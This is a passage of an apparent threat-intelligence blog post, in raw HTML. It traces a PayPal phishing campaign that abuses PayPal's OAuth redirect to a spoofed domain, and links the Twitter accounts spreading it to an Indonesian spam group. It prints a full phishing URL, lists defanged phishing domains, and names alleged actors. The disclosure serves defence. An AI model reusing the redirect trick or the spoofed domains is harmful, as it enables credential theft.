<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">And</span><span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;"><u>www.paypa</u><span style="white-space: normal;">[.]</span><u>com.lakukerascok</u><span style="white-space: normal;">[.]</span><u>com</u></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<b style="font-weight: normal;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Since the email was immediately reported to PayPal, we can witness the effectiveness of redirection chains to the longevity of phishing scams. </span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Both of these websites are hosted on the same Google server - 142.4.14<span style="white-space: normal;">[.]</span>169</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Along with a now empty Apache server:</span></span><br />
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "arial" , "helvetica" , sans-serif; margin-left: 1em; margin-right: 1em;"><img height="149" src="https://lh6.googleusercontent.com/ZMMVw9nRl8-UdAdzr1GqfTEdbeQb4ej7MjomcIEuYhF8h1CdYd_S4QCRRydJcrmJ4ONgjG6kCBZ4vTcQQSwhx5tJcVwTiVwKYnOndO9KCDTEbd_mjp8qubK2nqRX1zltyb6Y51E6" style="border: none; transform: rotate(0rad);" width="624" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">All pointing to the same styled ‘/stylec0de’ path like the following full URI path example:</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<b style="font-weight: normal;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
<blockquote class="tr_bq" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">https://www.paypal<span style="white-space: normal;">[.]</span>com/webapps/auth/protocol/openidconnect/v1/authorize?client_id=ATv4mHm-hSwKR8NFeKUJTagPctQ5ln4AExlRx3WY_ept7RIZVrA9FEr02IAnBjUd-cPTgck3TDqJbdG-&response_type=code&scope=openid%20profile%20email%20address%20phone&redirect_uri=https://www.paypal.com-signinaccountsafe.info/stylec0de</span></span></blockquote>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<b style="font-weight: normal;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Using a redirection path utilizing Paypal’s own authentication API backbone to piggyback as a means of seemingly legitimate Paypal correspondence. </span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">A victim looking to quickly resolve a financial issue might not go over the very long link, and miss the spoofed URL at the end of it - giving away his credentials to the attacker. By using a malicious iframe like this, a sophisticated campaign can be achieved relying on a victim’s </span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">innocence.</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><img height="34" src="https://lh6.googleusercontent.com/_0oI_MibIHMXv_sygeeeMbWP4ktGp2BCwfPGtkML-lwQ5xtqi_9izRbxn6dvQE9GpC_IsO1pPW4v5lueTUfvEt0zOB-Riz_cSOqCNEhJI1QIXDBszeZtpOoM16lKDOlKpPHWOQrE" style="border: none; margin-left: auto; margin-right: auto; transform: rotate(0rad);" width="640" /></span></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;">Source code.</span></td></tr>
</tbody></table>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><img height="285" src="https://lh6.googleusercontent.com/CZbRrFyV2Yi5e4KH6netqkxrcHMHRUrtHGxD1AIa4JjllbsysAmGvyECIBTjU7ui94DWv-UzZuRbjZVdm1vi2LUwWoPUm8XsyBCNOg2zvByHW-s5uNmAQQAqXNQ705zmO2286yMg" style="border: none; margin-left: auto; margin-right: auto; transform: rotate(0rad);" width="624" /></span></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;">Screenshot of the Spoofed login page.</span></td></tr>
</tbody></table>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 700; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: medium;">Twitter Activity</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">From this point on, we only had the now blocked websites left to go over, however since we can trace back activity to Twitter - we can actually hunt for anyone that was spreading these links and see if there’s any new activity, or maybe even find out who is behind this. This is due to the attacker’s choice of a t.co shortened link.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">We were able to identify the following accounts that seem be based out of Indonesia:</span></div>
<blockquote class="tr_bq" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<ul>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">https://twitter.com/StyleC0de</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">https://twitter.com/nugslackerc0de</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">https://twitter.com/shortermrguest</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">https://twitter.com/uboldmild</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">https://twitter.com/AqsaAssegaf</span></li>
</ul>
</blockquote>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">All of these accounts were using the same method and similar links. The original link from the screenshot could be found being spread by @uboldmild</span></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><img height="405" src="https://lh4.googleusercontent.com/5WEAfsKNsvhg5GRGJ5W1VnzrS4UO6dZoSrjFOgijfudeeYKO2-FjyknmG_v9mI5M0m3q6G5hl35jAfx6KB-Fq38ktqBz9bzMYZEKuahV1psrP66HmXb9ob-JOw7BFwMon9Pdb8Uf" style="border: none; margin-left: auto; margin-right: auto; transform: rotate(0rad);" width="624" /></span></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;">Tweet of the original link.</span></td></tr>
</tbody></table>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">As an elementary step of an investigation like this we checked for the usernames and names left by these individuals. </span></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">The Twitter user “Donna Curry” was registered under the handle ‘uboldmild’. Once we pivoted it to a simple search engine search, we managed to find it was connected to numerous phishing websites with the same scheme registered under the email uboldmild@yahoo.com.</span><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Websites such as :</span></span></div>
<blockquote class="tr_bq" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<ul>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">step-verivy[.]com</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">app-recoveryicloud[.]com</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">data-recoveryicloud[.]com</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">idmsa-accounts-security[.]com</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">datarecoveryicloud[.]com</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">com-verifyaccountappstore[.]info</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">responsibilitiesmacintosh[.]com</span></li>
</ul>
</blockquote>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">By looking at the Twitter account we can further correlate this by looking at what sort of links have been tweeted out by the user:</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "arial" , "helvetica" , sans-serif; margin-left: 1em; margin-right: 1em;"><img height="452" src="https://lh6.googleusercontent.com/gFiF8Nj9JNKB8--jq6KM6GN2-QWsmy70xXsl8V78oaQyhswAmfjWPvGvB5tMZucsjXHwD8cy-8Y-65tC51cM_DfYyUgNZ6b1znRTZIbB05tnwN4avQo5XvW8RlGxEthZlpVAMShX" style="border: none; transform: rotate(0rad);" width="585" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">With what looks like the first tweet being made to test out how the link shortener works on June 2017. </span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">This shows us how the phishing kits they used may have evolved along the past year, the same initial weaponization point of utilizing Twitter’s link shortener had not. </span></span><br />
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">When checking the rest of the users, we found that the user @StyleC0de has been doing the same - which can be seen through his Twitter account as well, however, he has done so under his actual name which can be traced back to numerous social media profiles he has under his name. </span><span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">Including a Youtube video showing a script he intended to sell in 2017:</span></div>
<blockquote class="tr_bq" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="color: black; font-family: "arial" , "helvetica" , sans-serif;"><a href="https://www.youtube.com/watch?v=agJxjXoUfBY" style="text-decoration: none;">https://www.youtube.com/watch?v=agJxjXoUfBY</a></span></span></blockquote>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">His latest exploit which was still live when we were writing this post is the one we showed you under his still currently used username/calling card ‘StyleC0de’.</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 700; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: medium;">SlackerC0de spam group </span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">SlackerC0de is an Indonesian hacking group popping into activity around 2015 with various low level scripts aimed at financial scams.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">When we checked the user @nugslackerc0de from Twitter, his username stood out as well. This was what led us to the Indonesian group which can be found at slackerc0de.us - and this group might actually prove to be the potential connection point between these Indonesian users. </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b style="font-weight: normal;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><img height="398" src="https://lh5.googleusercontent.com/6pDFKlpwtbPsdQCrCh8gHKHdpQJIOXggO3KRElVfhXDb6uxWGj_fhc4sNLkgmZxuhRj4rOLnlajGaGF-FS0HuJW3WTkAcrH2_Fr-5lOvqCF3EW9OOsyJY_gD4SVdhlpz1iyC-rvH" style="border: none; margin-left: auto; margin-right: auto; transform: rotate(0rad);" width="565" /></span></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;">An Apple account checker script shared on Pastebin.</span></td></tr>
</tbody></table>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">The main name that kept popping up at various source codes belonging to the group was a ‘Malhadi Jr.’ with websites like malhadi.slackerc0de.us hosting online tools like email bots and account checkers. Along with even an old personal Github account - https://github.com/MalhadiJr sharing similar repositories.</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b style="font-weight: normal;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">We managed to see that one of his tools was used for a phishing website last year with a similar URL. </span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><img height="63" src="https://lh6.googleusercontent.com/s6C8qy1gCTnPv-26_H8WVgLUpaGwoZJN82Aj71X8zMR9qpRARh5AX8JRrfiz6L58kryB8TQhMeSlQcz2eFjCQCrEILj1ENEbeC93rbj5uDRMueSiBAs-GebOLVNDv21rGCpeE3PC" style="border: none; margin-left: auto; margin-right: auto; transform: rotate(0rad);" width="624" /></span></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;">Source: ServiceHostNet</span></td></tr>
</tbody></table>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">So when considering our recent finding, it indeed seemed to us like the Slackerc0de group was a key factor in identifying the common points between the different users. </span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Slackerc0de themselves invite any prying eyes to a public group on Telegram where they share their tools of the trade. </span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b style="font-weight: normal;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "arial" , "helvetica" , sans-serif; margin-left: 1em; margin-right: 1em;"><img height="334" src="https://lh5.googleusercontent.com/lLPE6-ftY9hsUHgNsoTtLXa9Gv8wXUuCYBgDSAfwB8rdZsTbIaV0OvARQeaiVRL_8G1yyVv9ONze0oHw3VGUYuDZDp5YSKMb9A4MhPL3bqmEVpeqiLQkwEErfb7rtgDqPInK-r6T" style="border: none; transform: rotate(0rad);" width="476" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b style="font-weight: normal;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">When we peeked inside the group, we were able to see behind the scenes of a relatively close knit group collaborating in phishing efforts, like this user asking what a good subject for Yahoo email recipients is:</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"> </span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "arial" , "helvetica" , sans-serif; margin-left: 1em; margin-right: 1em;"><img height="330" src="https://lh4.googleusercontent.com/rNGzKpgtDYeBxBTPl4WaHfIdOuIz4xKmtZOV7GWvSAA-7n_4KZFzdPIAosAbcBpVOp6-39ID-AEwSsQ9NCoPDJEtZpuucLzBOoGOU0t0cHMKPqXhjmWtQfGcKpY0vDq968bDqyDy" style="border: none; transform: rotate(0rad);" width="540" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="white-space: pre-wrap;">A now deleted user instructing another member on his preferred link shorteners like Twitter and Owly: </span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "arial" , "helvetica" , sans-serif; margin-left: 1em; margin-right: 1em;"><img height="350" src="https://lh3.googleusercontent.com/SmmDYT0IOT552kJiMKX1hng891N7QIkTA9gd6vnHTVCJuINDiFkvPRnOw9f6KQ4b__H6MQ0OB58I9yuWOilz_pMiNi9HAM9sObsJuk3u1ENofUZtypeszfHHdv70X1nhTZWoRJ7f" style="border: none; transform: rotate(0rad);" width="551" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">And another one sharing PayPal Phishing Kit’s source code for download:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "arial" , "helvetica" , sans-serif; margin-left: 1em; margin-right: 1em;"><img height="442" src="https://lh6.googleusercontent.com/suuqzadBQSBe9LDN-p_ahdqfgaaRqDdsbtwmFKw7-mo-GQbvJeQr7cltP8YEyOL6EO6gCS-QNUR-2tYhoCjLlDQvNsA3XoE9dbbKoAjg6bkenXiWWL37vV_m2AE9Ci5yBp8wbmMc" style="border: none; transform: rotate(0rad);" width="435" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">A user sharing a screenshot of using a mailer with their Apple phishing website present in the background:</span></span><br />
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS2kMPWN3X22AL4jdyBGWRrfQ6i18bG3y2XaTJeFbKUHHyV9vnUV1uBE7ONwfSuD2r5I0clnsilUzdmu8bpbvtMeNnv8zS9ihyphenhyphengwBCwnofRuHRUeTlogi7lWu-WVVFYAh7p75jdPKQa_hT/s1600/apple.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: black; font-family: "arial" , "helvetica" , sans-serif;"><img border="0" data-original-height="768" data-original-width="1366" height="359" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS2kMPWN3X22AL4jdyBGWRrfQ6i18bG3y2XaTJeFbKUHHyV9vnUV1uBE7ONwfSuD2r5I0clnsilUzdmu8bpbvtMeNnv8zS9ihyphenhyphengwBCwnofRuHRUeTlogi7lWu-WVVFYAh7p75jdPKQa_hT/s640/apple.jpg" width="640" /></span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b style="font-weight: normal;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
